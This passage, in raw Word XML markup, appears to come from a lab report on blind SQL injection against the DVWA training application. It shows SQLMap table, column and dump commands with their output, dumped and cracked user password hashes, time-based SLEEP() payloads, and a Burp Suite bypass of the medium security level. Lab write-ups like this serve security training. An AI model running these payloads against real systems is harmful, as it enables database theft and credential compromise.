        </w:pBdr>
        <w:spacing w:after="240" w:before="240"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.2 Boolean-based Extraction (Low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Technique</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Boolean-based blind injection</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Impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7160"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="DDDDDD" w:sz="4"/>
              <w:left w:val="single" w:color="DDDDDD" w:sz="4"/>
              <w:bottom w:val="single" w:color="DDDDDD" w:sz="4"/>
              <w:right w:val="single" w:color="DDDDDD" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="FFF0F0" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Full database schema and data extraction</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Records</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5 user accounts with cracked credentials</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Description</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140" w:line="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Boolean-based blind injection extracts data character by character by appending conditional SQL logic. SQLMap used the page's binary response (exists vs. blank) as an oracle, performing thousands of requests to reconstruct strings bit by bit. The full extraction was performed in three stages: table enumeration, column enumeration, and data dump.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Step 1 — Table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 dvwa --tables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[21:21:33] [INFO] retrieved: 2</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="230"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="222222"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">[21:21:34] [INFO] retrieved: guestbook</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="230"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="222222"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">[21:21:42] [INFO] retrieved: users</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="230"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="222222"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="230"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="222222"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Database: dvwa</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="230"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="222222"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">[2 tables]</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guestbook |</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="230"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="222222"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">| users     |</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="230"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="222222"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">+-----------+</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Step 2 — Column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 dvwa -T users --columns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Database: dvwa  Table: users</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="230"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="222222"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">[8 columns]</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Column       | Type        |</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user_id      | int(6)      |</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="230"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="222222"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">| first_name   | varchar(15) |</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="230"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="222222"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">| last_name    | varchar(15) |</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="230"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="222222"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">| user         | varchar(15) |</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="230"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="222222"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">| password     | varchar(32) |</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="230"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="222222"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">| avatar       | varchar(70) |</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="230"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="222222"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">| last_login   | timestamp   |</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="230"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="222222"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">| failed_login | int(3)      |</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="230"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="222222"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">+--------------+-------------+</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Step 3 — Full Data Dump with Credential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 dvwa -T users --dump</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Extracted Credentials (MD5 hashes auto-cracked by SQLMap)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800"/>
        <w:gridCol w:w="1560"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="600"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="2E4057" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">user_id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1400"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="2E4057" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">user</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3800"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="2E4057" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">password (MD5 hash)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1560"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="2E4057" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">cracked</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1337</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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8d3533d75ae2c3966d7e0d4fcc69216b</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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charley</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admin</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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5f4dcc3b5aa765d61d8327deb882cf99</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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password</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gordonb</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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e99a18c428cb38d5f260853678922e03</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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abc123</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pablo</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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0d107d09f5bbe40cade3de5c71e9e9b7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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letmein</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smithy</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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5f4dcc3b5aa765d61d8327deb882cf99</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="15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val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">password</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Evidence — Figure 1: SQLMap Terminal Output (Low Security)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="6000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37185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1: SQLMap successfully dumped all 5 user records. MD5 hashes were automatically cracked revealing plaintext passwords. Both boolean-based and time-based blind techniques were confirmed.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="E0E0E0" w:sz="4"/>
        </w:pBdr>
        <w:spacing w:after="240" w:before="240"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.3 Time-based Blind Injection Using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Technique</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Time-based blind injection via SLEEP()</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Function</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MySQL SLEEP() / BENCHMARK() as timing oracle</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Use Case</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Alternative extraction when boolean oracle unavailable</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Description</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140" w:line="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Time-based blind injection uses MySQL's SLEEP() function to introduce a deliberate server delay when a condition evaluates as TRUE. The attacker measures response time: a ~5 second delay indicates the condition is TRUE, an instant response indicates FALSE. This technique does not require any visible difference in page content, making it viable even when the boolean oracle is removed.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140" w:line="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">SQLMap confirmed time-based blind injection as valid on this target, as shown in the detection output below. The MySQL execution environment (MySQL &gt;= 5.0.12 on Ubuntu) supports SLEEP() natively.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Detected Payload (from SQLMap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id=1' AND (SELECT 4792 FROM (SELECT(SLEEP(5)))pPHJ) AND 'tRBy'='tRBy&amp;Submit=Submit</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Time-based Conditional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1' AND IF( SUBSTRING(database(),1,1)='d' , SLEEP(5) , 0 )#</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="230"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="A9B1D6"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="230"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="A9B1D6"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">-- If first character of database name is 'd': page delays ~5 seconds (TRUE)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="230"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="A9B1D6"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">-- If not: page responds instantly                             (FALSE)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Observation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140" w:line="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Manual browser-based SLEEP() tests showed inconsistent response times during this assessment, likely attributable to PHP execution time limits (max_execution_time) configured on this server, or server load during the test window. However, SQLMap's optimized payload formulation confirmed the technique as valid and it was stored in the session cache. Boolean-based extraction was used as the primary channel for data exfiltration due to its greater reliability on this server configuration.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="E0E0E0" w:sz="4"/>
        </w:pBdr>
        <w:spacing w:after="240" w:before="240"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.4 Medium Security Level — Bypassing the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Security Level</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Medium</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Protection Added</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Dropdown input control + mysqli_real_escape_string()</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Bypass Method</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7160"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="DDDDDD" w:sz="4"/>
              <w:left w:val="single" w:color="DDDDDD" w:sz="4"/>
              <w:bottom w:val="single" w:color="DDDDDD" w:sz="4"/>
              <w:right w:val="single" w:color="DDDDDD" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="FFFBF0" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Intercept POST request with Burp Suite Repeater</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Injection Type</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Numeric (no quotes required)</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Endpoint</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POST /vulnerabilities/sqli_blind/</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Description</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140" w:line="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">At Medium security, DVWA replaces the free-text input field with a dropdown menu to prevent direct payload entry. The mysqli_real_escape_string() function is also applied to escape special characters such as single quotes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140" w:line="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">However, a critical developer error remains: the $id variable is inserted into the SQL query WITHOUT surrounding quote characters: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SELECT first_name, last_name FROM users WHERE user_id = $id;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140" w:line="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Without string delimiters, the escape function has no effect. Numeric injection does not require quotes and bypasses both controls entirely. The dropdown was circumvented by intercepting the POST request with Burp Suite and editing the id field directly in the Repeater tab.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Exploitation via Burp Suite Repeater</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140" w:line="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The following steps were performed:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Configured browser to proxy through Burp Suite (127.0.0.1:8080).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Selected any value from the DVWA dropdown and clicked Submit. Burp intercepted the POST request.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Sent the request to Repeater and modified the id= field with the boolean-based payload.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
